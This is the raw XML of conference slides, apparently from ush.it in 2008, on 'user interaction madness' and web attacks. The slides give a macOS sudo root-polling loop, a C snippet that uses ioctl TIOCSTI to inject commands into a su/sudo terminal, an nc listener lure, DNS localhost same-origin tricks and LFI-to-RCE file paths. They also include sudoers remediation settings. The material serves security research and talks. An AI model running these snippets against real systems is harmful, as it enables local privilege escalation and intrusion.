            <text:p text:style-name="P1">- 5 minute <text:span text:style-name="T25">password caching</text:span><text:span text:style-name="T29">.</text:span></text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"><text:span text:style-name="T30">- </text:span><text:span text:style-name="T25">global session</text:span> (not tied to a tty).</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">- sudo <text:span text:style-name="T25">logs to /var/log/system.log</text:span> (weak perms)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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>macos/sudo local kit</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P5" draw:layer="layout" svg:width="25.199cm" svg:height="13.609cm" svg:x="1.401cm" svg:y="5.039cm">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T31">while [ 1 ]; do if [ "</text:span><text:span text:style-name="T32">`(echo a | sudo -S id)2&gt;&amp;1 | grep "^uid=0" | wc </text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T32">-l`</text:span><text:span text:style-name="T31">" == "1" ]; then echo ROOT; fi; sleep 5; done</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T31"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T31"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T31">nc -l -p 7053</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T31">xterm -e 'echo "Hello moron." &amp;&amp; nc localhost 7053 -vvv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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>macos/sudo local kit</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P5" draw:layer="layout" svg:width="25.199cm" svg:height="14.488cm" svg:x="1.401cm" svg:y="4.599cm">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">Remediation plan:</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T2">Defaults:ALL </text:span><text:span text:style-name="T33">!syslog</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T2">Defaults:ALL </text:span><text:span text:style-name="T33">logfile</text:span><text:span text:style-name="T2">=/var/log/secure.log</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T2">Defaults:ALL </text:span><text:span text:style-name="T33">timestamp_timeout</text:span><text:span text:style-name="T2">=0</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T2">Defaults:ALL </text:span><text:span text:style-name="T33">tty_tickets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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.779cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>su/sudo arbitrary char injection</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="24.776cm" svg:x="1.401cm" svg:y="-0.544cm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>ioctl(TIOCSTI)</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="2"/></text:span><text:span text:style-name="T34">char* </text:span><text:span text:style-name="T35">payload</text:span><text:span text:style-name="T34"> = "id\nsudo -u root touch /root/ciao123\necho 'hello'";</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34">[..]</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="2"/></text:span><text:span text:style-name="T34">if ((pid = fork()) == 0) {</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34">[..]</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="6"/></text:span><text:span text:style-name="T34">sleep (1);</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="6"/></text:span><text:span text:style-name="T34">/* </text:span><text:span text:style-name="T35">Keep stuffing characters into the keyboard buffer</text:span><text:span text:style-name="T34">... */</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="6"/></text:span><text:span text:style-name="T34">for (i=0; (c = payload[i]) != '\0'; i++) {</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="10"/></text:span><text:span text:style-name="T34">if (</text:span><text:span text:style-name="T35">ioctl</text:span><text:span text:style-name="T34"> (0, </text:span><text:span text:style-name="T35">TIOCSTI</text:span><text:span text:style-name="T34">, &amp;c) == -1) {</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="14"/></text:span><text:span text:style-name="T34">perror ("ioctl() failed");</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34"><text:s text:c="14"/></text:span><text:span text:style-name="T34">return 1;</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T34">[..]</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T36"/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draw:frame presentation:style-name="pr4" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>su/sudo arbitrary char injection</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="13.65cm" svg:x="1.399cm" svg:y="5.022cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T37">Can't be fixed</text:span> as it's a feature:</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"><text:span text:style-name="T1">- http://lists.virus.org/debian-security-0407/msg00214.html </text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1">- http://www.redhat.com/archives/fedora-devel-list/2004-July/msg01314.html </text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1">- http://lists.virus.org/debian-security-0407/threads.html#00160 </text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T38">Summarizing:</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1"/></text:p>
            <text:p text:style-name="P1">- open fd 0 = <text:span text:style-name="T37">other “context”</text:span> (-;</text:p>
            <text:p text:style-name="P1">- init scripts (non-interactive, fixable and <text:span text:style-name="T37">fixed</text:span>).</text:p>
            <text:p text:style-name="P1">- sudo insecure defaults lead to local root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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.779cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>su/sudo arbitrary char injection</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr12" draw:text-style-name="P5" draw:layer="layout" svg:width="25.199cm" svg:height="19.101cm" svg:x="1.401cm" svg:y="2.54cm">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2">DEMO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draw:frame presentation:style-name="pr10" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.779cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>what you see is not what you copy</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr11" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="13.86cm" svg:x="1.401cm" svg:y="4.915cm">
          <draw:text-box>
            <text:p text:style-name="P1">Works in every `rich` browser tested</text:p>
            <text:p text:style-name="P1">(FF, Opera, Safari, IE).</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"><text:span text:style-name="T25">The clipboard is your enemy!</text:span></text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">FUCK RICH TEXT, GO GO ASCII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draw:frame presentation:style-name="pr10" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.779cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>what you see is not what you copy</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr11" draw:text-style-name="P5" draw:layer="layout" svg:width="25.199cm" svg:height="13.86cm" svg:x="1.401cm" svg:y="4.915cm">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2">DEMO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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">Web disservices: lazy admin<text:line-break/>cripples same origin policy</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="13.609cm" svg:x="1.401cm" svg:y="5.039cm">
          <draw:text-box>
            <text:p text:style-name="P1">local.zzz.com same origin biohazard:</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"><text:span text:style-name="T39">for NS in `dig +noall +answer NS tin.it | sed "s/\t/ /g;s/ <text:s/>*/ /g" | cut -d " " -f5`; do dig tin.it @$NS; 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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">Web disservices: lazy admin<text:line-break/>cripples same origin policy</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P12" draw:layer="layout" svg:width="25.199cm" svg:height="18.561cm" svg:x="1.401cm" svg:y="2.565cm">
          <draw:text-box>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"># dig localhost.tin.it</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">; &lt;&lt;&gt;&gt; DiG 9.4.2 &lt;&lt;&gt;&gt; localhost.tin.it</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; global options: <text:s/>printcmd</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; Got answer:</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 30807</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; QUESTION SECTION:</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;localhost.tin.it. <text:s text:c="13"/>IN <text:s text:c="5"/>A</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; ANSWER SECTION:</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T41">localhost.tin.it. <text:s text:c="6"/>251 <text:s text:c="4"/>IN <text:s text:c="5"/>A <text:s text:c="6"/>127.0.0.1</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; AUTHORITY SECTION:</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">tin.it. <text:s text:c="16"/>1516 <text:s text:c="3"/>IN <text:s text:c="5"/>NS <text:s text:c="5"/>dnsca.tin.it.</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">tin.it. <text:s text:c="16"/>1516 <text:s text:c="3"/>IN <text:s text:c="5"/>NS <text:s text:c="5"/>dns.tin.it.</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; ADDITIONAL SECTION:</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">dnsca.tin.it. <text:s text:c="10"/>3505 <text:s text:c="3"/>IN <text:s text:c="5"/>A <text:s text:c="6"/>195.31.190.31</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">dns.tin.it. <text:s text:c="12"/>3415 <text:s text:c="3"/>IN <text:s text:c="5"/>A <text:s text:c="6"/>194.243.154.62</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40"/></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; Query time: 99 msec</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; SERVER: 192.168.0.1#53(192.168.0.1)</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; WHEN: Sun Jun 29 19:16:54 2008</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T40">;; MSG SIZE <text:s/>rcvd: 136</text:span></text:p>
            <text:p text:style-name="P11"><text:span text:style-name="T4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draw:frame presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">Web disservices: lfi2rce<text:line-break/>the hax00r way</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="13.609cm" svg:x="1.401cm" svg:y="5.039cm">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T25">std logfile /var/log/vsftpd.log</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T25">session file /tmp/sess_1234</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T25">apache /proc/123/fd/123</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T25">apache /proc/self/fd/123</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T25">apache /proc/self/environ</text:span></text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/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draw:frame presentation:style-name="pr13" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="3.257cm" svg:x="1.399cm" svg:y="0.962cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P1">Thanks</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P5" draw:layer="layout" svg:width="25.191cm" svg:height="13.613cm" svg:x="1.399cm" svg:y="5.04cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2">&gt; ush.it &lt;</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">teammates! s4tan, saidone, ..</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">friends! kuza55, wisec, ..</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">yrbas &lt;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8-06T13:31:07</meta:creation-date>
    <dc:date>2008-12-28T05:23:24</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>19</meta:editing-cycles>
    <meta:editing-duration>P4DT14H2M29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